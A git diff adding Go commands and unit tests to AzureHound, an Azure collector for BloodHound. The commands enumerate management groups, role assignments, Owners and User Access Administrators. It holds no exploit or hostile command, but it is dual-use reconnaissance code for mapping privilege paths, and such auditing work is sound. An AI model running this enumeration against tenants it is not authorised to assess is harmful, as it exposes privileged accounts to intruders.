+ mockClient.EXPECT().ListAzureManagementGroupDescendants(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupDescendantChannel).Times(1) + mockClient.EXPECT().ListAzureManagementGroupDescendants(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupDescendantChannel2).Times(1) + channel := listManagementGroupDescendants(ctx, mockClient, mockManagementGroupsChannel) + + go func() { + defer close(mockManagementGroupsChannel) + mockManagementGroupsChannel <- AzureWrapper{ + Data: models.ManagementGroup{}, + } + mockManagementGroupsChannel <- AzureWrapper{ + Data: models.ManagementGroup{}, + } + }() + go func() { + defer close(mockManagementGroupDescendantChannel) + mockManagementGroupDescendantChannel <- client.AzureResult[azure.DescendantInfo]{} + mockManagementGroupDescendantChannel <- client.AzureResult[azure.DescendantInfo]{} + }() + go func() { + defer close(mockManagementGroupDescendantChannel2) + mockManagementGroupDescendantChannel2 <- client.AzureResult[azure.DescendantInfo]{} + mockManagementGroupDescendantChannel2 <- client.AzureResult[azure.DescendantInfo]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(azure.DescendantInfo); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, azure.DescendantInfo{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(azure.DescendantInfo); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, azure.DescendantInfo{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(azure.DescendantInfo); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, azure.DescendantInfo{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-management-group-owners.go b/cmd/list-management-group-owners.go new file mode 100644 index 0000000..b076ed6 --- /dev/null +++ b/cmd/list-management-group-owners.go @@ -0,0 +1,80 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupOwnersCmd) +} + +var listManagementGroupOwnersCmd = &cobra.Command{ + Use: "management-group-owners", + Long: "Lists Azure Management Group Owners", + Run: listManagementGroupOwnersCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group owners...") + start := time.Now() + managementGroups := listManagementGroups(ctx, azClient) + roleAssignments := listManagementGroupRoleAssignments(ctx, azClient, managementGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listManagementGroupOwners(ctx, roleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupOwners( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.ManagementGroupRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ManagementGroupRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, mgmtGroupRoleAssignmentFilter(constants.OwnerRoleID)) + owners := internal.Map(filteredAssignments, func(ra models.ManagementGroupRoleAssignment) models.ManagementGroupOwner { + return models.ManagementGroupOwner{ + Owner: ra.RoleAssignment, + ManagementGroupId: ra.ManagementGroupId, + } + }) + return NewAzureWrapper(enums.KindAZManagementGroupOwner, models.ManagementGroupOwners{ + ManagementGroupId: ra.Data.ManagementGroupId, + Owners: owners, + }) + }) +} diff --git a/cmd/list-management-group-owners_test.go b/cmd/list-management-group-owners_test.go new file mode 100644 index 0000000..fa7ec0c --- /dev/null +++ b/cmd/list-management-group-owners_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listManagementGroupOwners(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZManagementGroupRoleAssignment, + models.ManagementGroupRoleAssignments{ + ManagementGroupId: "foo", + RoleAssignments: []models.ManagementGroupRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-management-group-role-assignments.go b/cmd/list-management-group-role-assignments.go new file mode 100644 index 0000000..d003eb7 --- /dev/null +++ b/cmd/list-management-group-role-assignments.go @@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupRoleAssignmentsCmd) +} + +var listManagementGroupRoleAssignmentsCmd = &cobra.Command{ + Use: "management-group-role-assignments", + Long: "Lists Management Group Role Assignments", + Run: listManagementGroupRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group role assignments...") + start := time.Now() + managementGroups := listManagementGroups(ctx, azClient) + stream := listManagementGroupRoleAssignments(ctx, azClient, managementGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupRoleAssignments(ctx context.Context, client client.AzureClient, managementGroups <-chan interface{}) <-chan azureWrapper[models.ManagementGroupRoleAssignments] { + var ( + out = make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), managementGroups) { + if managementGroup, ok := result.(AzureWrapper).Data.(models.ManagementGroup); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating management group role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, managementGroup.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + managementGroupRoleAssignments = models.ManagementGroupRoleAssignments{ + ManagementGroupId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "atScope()", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this managementGroup", "managementGroupId", id) + } else { + managementGroupRoleAssignment := models.ManagementGroupRoleAssignment{ + ManagementGroupId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found managementGroup role assignment", "managementGroupRoleAssignment", managementGroupRoleAssignment) + count++ + managementGroupRoleAssignments.RoleAssignments = append(managementGroupRoleAssignments.RoleAssignments, managementGroupRoleAssignment) + } + } + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper( + enums.KindAZManagementGroupRoleAssignment, + managementGroupRoleAssignments, + )); !ok { + return + } + log.V(1).Info("finished listing managementGroup role assignments", "managementGroupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all management group role assignments") + }() + + return out +} diff --git a/cmd/list-management-group-role-assignments_test.go b/cmd/list-management-group-role-assignments_test.go new file mode 100644 index 0000000..7f21669 --- /dev/null +++ b/cmd/list-management-group-role-assignments_test.go @@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListResourceGroupRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockResourceGroupsChannel := make(chan interface{}) + mockResourceGroupRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockResourceGroupRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupRoleAssignmentChannel2).Times(1) + channel := listResourceGroupRoleAssignments(ctx, mockClient, mockResourceGroupsChannel) + + go func() { + defer close(mockResourceGroupsChannel) + mockResourceGroupsChannel <- AzureWrapper{ + Data: models.ResourceGroup{}, + } + mockResourceGroupsChannel <- AzureWrapper{ + Data: models.ResourceGroup{}, + } + }() + go func() { + defer close(mockResourceGroupRoleAssignmentChannel) + mockResourceGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + } + mockResourceGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + }() + go func() { + defer close(mockResourceGroupRoleAssignmentChannel2) + mockResourceGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + mockResourceGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } +} diff --git a/cmd/list-management-group-user-access-admins.go b/cmd/list-management-group-user-access-admins.go new file mode 100644 index 0000000..ecb4be0 --- /dev/null +++ b/cmd/list-management-group-user-access-admins.go @@ -0,0 +1,80 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupUserAccessAdminsCmd) +} + +var listManagementGroupUserAccessAdminsCmd = &cobra.Command{ + Use: "management-group-user-access-admins", + Long: "Lists Azure Management Group User Access Admins", + Run: listManagementGroupUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group user access admins...") + start := time.Now() + managementGroups := listManagementGroups(ctx, azClient) + roleAssignments := listManagementGroupRoleAssignments(ctx, azClient, managementGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listManagementGroupUserAccessAdmins(ctx, roleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupUserAccessAdmins( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.ManagementGroupRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ManagementGroupRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, mgmtGroupRoleAssignmentFilter(constants.UserAccessAdminRoleID)) + uaas := internal.Map(filteredAssignments, func(ra models.ManagementGroupRoleAssignment) models.ManagementGroupUserAccessAdmin { + return models.ManagementGroupUserAccessAdmin{ + UserAccessAdmin: ra.RoleAssignment, + ManagementGroupId: ra.ManagementGroupId, + } + }) + return NewAzureWrapper(enums.KindAZManagementGroupUserAccessAdmin, models.ManagementGroupUserAccessAdmins{ + ManagementGroupId: ra.Data.ManagementGroupId, + UserAccessAdmins: uaas, + }) + }) +} diff --git a/cmd/list-management-group-user-access-admins_test.go b/cmd/list-management-group-user-access-admins_test.go new file mode 100644 index 0000000..39c9d1b --- /dev/null +++ b/cmd/list-management-group-user-access-admins_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listManagementGroupUserAccessAdmins(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZManagementGroupRoleAssignment, + models.ManagementGroupRoleAssignments{ + ManagementGroupId: "foo", + RoleAssignments: []models.ManagementGroupRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-management-groups.go b/cmd/list-management-groups.go new file mode 100644 index 0000000..3af3019 --- /dev/null +++ b/cmd/list-management-groups.go @@ -0,0 +1,94 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupsCmd) +} + +var listManagementGroupsCmd = &cobra.Command{ + Use: "management-groups", + Long: "Lists Azure Active Directory Management Groups", + Run: listManagementGroupsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory management groups...") + start := time.Now() + + stream := listManagementGroups(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroups(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureManagementGroups(ctx, "") { + if item.Error != nil { + log.Info("warning: unable to process azure management groups; either the organization has no management groups or azurehound does not have the reader role on the root management group.") + return + } else if len(config.AzMgmtGroupId.Value().([]string)) == 0 || contains(config.AzMgmtGroupId.Value().([]string), item.Ok.Name) { + log.V(2).Info("found management group", "managementGroup", item) + count++ + mgmtGroup := models.ManagementGroup{ + ManagementGroup: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + } + + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZManagementGroup, + Data: mgmtGroup, + }); !ok { + return + } + } + } + log.Info("finished listing all management groups", "count", count) + }() + + return out +} diff --git a/cmd/list-management-groups_test.go b/cmd/list-management-groups_test.go new file mode 100644 index 0000000..72f980c --- /dev/null +++ b/cmd/list-management-groups_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroups(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.ManagementGroup]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureManagementGroups(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.ManagementGroup]{ + Ok: azure.ManagementGroup{}, + } + mockChannel <- client.AzureResult[azure.ManagementGroup]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.ManagementGroup]{ + Ok: azure.ManagementGroup{}, + } + }() + + channel := listManagementGroups(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-resource-group-owners.go b/cmd/list-resource-group-owners.go new file mode 100644 index 0000000..e049501 --- /dev/null +++ b/cmd/list-resource-group-owners.go @@ -0,0 +1,83 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listResourceGroupOwnersCmd) +} + +var listResourceGroupOwnersCmd = &cobra.Command{ + Use: "resource-group-owners", + Long: "Lists Azure Resource Group Owners", + Run: listResourceGroupOwnersCmdImpl, + SilenceUsage: true, +} + +func listResourceGroupOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure resource group owners...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + resourceGroups := listResourceGroups(ctx, azClient, subscriptions) + roleAssignments := listResourceGroupRoleAssignments(ctx, azClient, resourceGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listResourceGroupOwners(ctx, roleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listResourceGroupOwners( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.ResourceGroupRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ResourceGroupRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, rgRoleAssignmentFilter(constants.OwnerRoleID)) + + owners := internal.Map(filteredAssignments, func(ra models.ResourceGroupRoleAssignment) models.ResourceGroupOwner { + return models.ResourceGroupOwner{ + Owner: ra.RoleAssignment, + ResourceGroupId: ra.ResourceGroupId, + } + }) + + return NewAzureWrapper(enums.KindAZResourceGroupOwner, models.ResourceGroupOwners{ + ResourceGroupId: ra.Data.ResourceGroupId, + Owners: owners, + }) + }) +} diff --git a/cmd/list-resource-group-owners_test.go b/cmd/list-resource-group-owners_test.go new file mode 100644 index 0000000..b580683 --- /dev/null +++ b/cmd/list-resource-group-owners_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListResourceGroupOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listResourceGroupOwners(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZResourceGroupRoleAssignment, + models.ResourceGroupRoleAssignments{ + ResourceGroupId: "foo", + RoleAssignments: []models.ResourceGroupRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-resource-group-role-assignments.go b/cmd/list-resource-group-role-assignments.go new file mode 100644 index 0000000..5d89a56 --- /dev/null +++ b/cmd/list-resource-group-role-assignments.go @@ -0,0 +1,130 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, 